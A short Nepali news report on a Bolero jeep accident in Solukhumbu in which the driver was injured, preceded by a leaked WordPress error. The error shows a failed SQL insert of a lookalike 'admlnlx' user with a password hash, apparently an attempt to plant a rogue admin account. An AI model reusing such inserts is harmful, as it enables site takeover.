WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDBDJ.LeR2hZOzywS/8wkXwyTI3oEX.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 00:09:58', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । हलेसी तुवाचुङ नगरपालिका पात्लेमा बलेरो जिप दुर्घटना हुदा एक जना गम्भिर घाइते भएका छन् ।
दिक्तेलबाट तरकारी लिएर काठमाण्डौ तर्फ जादै गरेको को २ च १८३३ नम्बरको बोलेरो हलेसी तुवाचुङ नगरपालिका ७ पात्लेमा दुर्घटना भएको हो ।
घुम्तिको मोडमा ब्रेकको पाईप फुटेर अनियन्त्रित भई बोेलेरो दुर्घटना भएको प्रहरिको अनुमान छ । बोलेरो दुर्घटनाबाट उदयपुर गाइघाट स्थायी घर भएका चालक रुद्र बहादुर खत्रि घाईते भएका हुन । घाईतेलाई हलेसी स्थित क्लिनिकमा उपचार गरि थप उपचारको लागि काठमाण्डौ पठाईएको जिल्ला प्रहरी कार्यलय खोटाङले जनाएको छ ।
बलेरो रोडबाट कारिब ५०/६० मिटर तल खसेको थियो ।